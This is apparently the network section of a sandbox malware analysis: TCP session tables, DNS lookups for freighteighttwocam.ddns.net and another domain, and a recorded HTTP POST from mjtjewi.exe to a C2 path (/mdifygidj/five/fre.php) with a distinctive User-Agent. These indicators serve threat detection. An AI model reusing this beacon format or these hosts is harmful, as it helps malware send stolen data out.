                                                        Oct 3, 2024 09:22:22.049027920 CEST6442480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.053824902 CEST806442445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.207492113 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.212685108 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.212795019 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.215054035 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.220110893 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.220180988 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.225085020 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.910722017 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.910773039 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:22.910892010 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:22.999142885 CEST6442580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.004091024 CEST806442545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.254395008 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.259706020 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.259807110 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.364090919 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.369240999 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.369318008 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.374342918 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.931077957 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.931318045 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.931463957 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:23.931566954 CEST6442680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:23.936121941 CEST806442645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.093225002 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.098130941 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.098208904 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.101181030 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.105935097 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.106030941 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.110836983 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.748373032 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.748404026 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.748652935 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.749772072 CEST6442780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.754606009 CEST806442745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.897533894 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.902664900 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.902770996 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.905708075 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.910557032 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:24.910666943 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:24.915587902 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.638870001 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.638891935 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.639024019 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.639116049 CEST6442880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.644790888 CEST806442845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.800235033 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.805989981 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.806111097 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.810230017 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.815943003 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:25.816015959 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:25.821641922 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.473027945 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.473089933 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.473248005 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.479259968 CEST6442980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.484271049 CEST806442945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.646806002 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.651676893 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.651757002 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.654994965 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.659781933 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:26.659849882 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:26.664727926 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.331634998 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.331707001 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.331888914 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.331939936 CEST6443080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.336837053 CEST806443045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.491563082 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.496582985 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.496674061 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.499201059 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.504056931 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:27.504132032 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:27.509526014 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.156263113 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.156297922 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.156424046 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.156507015 CEST6443180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.161528111 CEST806443145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.295455933 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.300467968 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.303821087 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.306813955 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.311655045 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:28.311778069 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:28.316627026 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.195664883 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.195754051 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.195837021 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.292330980 CEST6443280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.297416925 CEST806443245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.625860929 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.630826950 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.630925894 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.634440899 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.639374971 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:29.639445066 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:29.646051884 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.480031967 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.480233908 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.480474949 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.480524063 CEST6443380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.485332012 CEST806443345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.632863045 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.637936115 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.638108015 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.641104937 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.645963907 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:30.646051884 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:30.650814056 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.486274004 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.486406088 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.486447096 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.486486912 CEST6443480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.491240978 CEST806443445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.658930063 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.664025068 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.664165020 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.669754982 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.674626112 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:31.674681902 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:31.679503918 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.303347111 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.303451061 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.303507090 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.306659937 CEST6443580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.311822891 CEST806443545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.490616083 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.495699883 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.495773077 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.497924089 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.502873898 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:32.502916098 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:32.507778883 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.187992096 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.188153982 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.188157082 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.188196898 CEST6443680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.193006039 CEST806443645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.325853109 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.332051992 CEST806443745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.332197905 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.334327936 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.340368986 CEST806443745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:33.340490103 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:33.346483946 CEST806443745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:34.292666912 CEST806443745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:34.292855024 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.298011065 CEST806443745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:34.298105001 CEST6443780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.435754061 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.440736055 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:34.440934896 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.443031073 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.448096037 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:34.448158026 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:34.453089952 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.079196930 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.079221010 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.079411030 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.079411983 CEST6443880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.085141897 CEST806443845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.212918997 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.217974901 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.218071938 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.220199108 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.224936962 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.225001097 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.229795933 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.848511934 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.848560095 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:35.848696947 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.848786116 CEST6443980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:35.853533983 CEST806443945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.000144958 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.005745888 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.005851030 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.009468079 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.015407085 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.015475988 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.020795107 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.750042915 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.750072002 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.750157118 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.750319004 CEST6444080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.755142927 CEST806444045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.904503107 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.909526110 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.909642935 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.912101984 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.917062998 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:36.917140007 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:36.922022104 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.777426004 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.777475119 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.777548075 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.777548075 CEST6444180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.782566071 CEST806444145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.919142008 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.924076080 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.924159050 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.926255941 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.931313992 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:37.931400061 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:37.936233044 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.687633038 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.687695980 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.687921047 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.687921047 CEST6444280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.692949057 CEST806444245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.824619055 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.829576015 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.829663992 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.831857920 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.836646080 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:38.836711884 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:38.841528893 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.523708105 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.523859024 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.524137974 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.524243116 CEST6444380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.530057907 CEST806444345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.669563055 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.674635887 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.674762011 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.676918030 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.681864977 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:39.681925058 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:39.686739922 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.350311041 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.350358963 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.350488901 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.350533009 CEST6444480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.355345011 CEST806444445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.598413944 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.603490114 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.603915930 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.609555960 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.614600897 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:40.614660025 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:40.619858980 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.352128983 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.352351904 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.352525949 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.352597952 CEST6444580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.357295036 CEST806444545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.543690920 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.549698114 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.549899101 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.552056074 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.558101892 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:41.558182955 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:41.564050913 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.187657118 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.187695980 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.187829971 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.187880039 CEST6444680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.192689896 CEST806444645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.331733942 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.336947918 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.337194920 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.339214087 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.344338894 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:42.344415903 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:42.349287987 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.088213921 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.088359118 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.088517904 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.088592052 CEST6444780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.095305920 CEST806444745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.237551928 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.242518902 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.243807077 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.246021032 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.251410961 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.251789093 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.256630898 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.910703897 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.910820007 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:43.911035061 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.911103010 CEST6444880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:43.915997982 CEST806444845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.055253029 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.060436010 CEST806444945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.060545921 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.062635899 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.067401886 CEST806444945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.067473888 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.072300911 CEST806444945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.839922905 CEST806444945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.840137959 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.840225935 CEST806444945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:22:44.840279102 CEST6444980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:22:44.845007896 CEST806444945.149.241.169192.168.2.11
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 3, 2024 09:20:40.500483990 CEST5501953192.168.2.111.1.1.1
                                                        Oct 3, 2024 09:20:40.665950060 CEST53550191.1.1.1192.168.2.11
                                                        Oct 3, 2024 09:20:48.098545074 CEST5905753192.168.2.111.1.1.1
                                                        Oct 3, 2024 09:20:48.111200094 CEST53590571.1.1.1192.168.2.11
                                                        Oct 3, 2024 09:20:57.588593006 CEST53534421.1.1.1192.168.2.11
                                                        Oct 3, 2024 09:20:59.065795898 CEST53495051.1.1.1192.168.2.11
                                                        Oct 3, 2024 09:21:47.463262081 CEST4988653192.168.2.111.1.1.1
                                                        Oct 3, 2024 09:21:47.474385977 CEST53498861.1.1.1192.168.2.11
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 3, 2024 09:20:40.500483990 CEST192.168.2.111.1.1.10x381Standard query (0)www.sodiumlaurethsulfatedesyroyer.comA (IP address)IN (0x0001)false
                                                        Oct 3, 2024 09:20:48.098545074 CEST192.168.2.111.1.1.10x2040Standard query (0)freighteighttwocam.ddns.netA (IP address)IN (0x0001)false
                                                        Oct 3, 2024 09:21:47.463262081 CEST192.168.2.111.1.1.10xa4acStandard query (0)freighteighttwocam.ddns.netA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 3, 2024 09:20:40.665950060 CEST1.1.1.1192.168.2.110x381No error (0)www.sodiumlaurethsulfatedesyroyer.com188.114.96.3A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 09:20:40.665950060 CEST1.1.1.1192.168.2.110x381No error (0)www.sodiumlaurethsulfatedesyroyer.com188.114.97.3A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 09:20:48.111200094 CEST1.1.1.1192.168.2.110x2040No error (0)freighteighttwocam.ddns.net45.149.241.169A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 09:21:47.474385977 CEST1.1.1.1192.168.2.110xa4acNo error (0)freighteighttwocam.ddns.net45.149.241.169A (IP address)IN (0x0001)false
                                                        • www.sodiumlaurethsulfatedesyroyer.com
                                                        • freighteighttwocam.ddns.net
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.114971145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:20:48.126672029 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 176
                                                        Connection: close
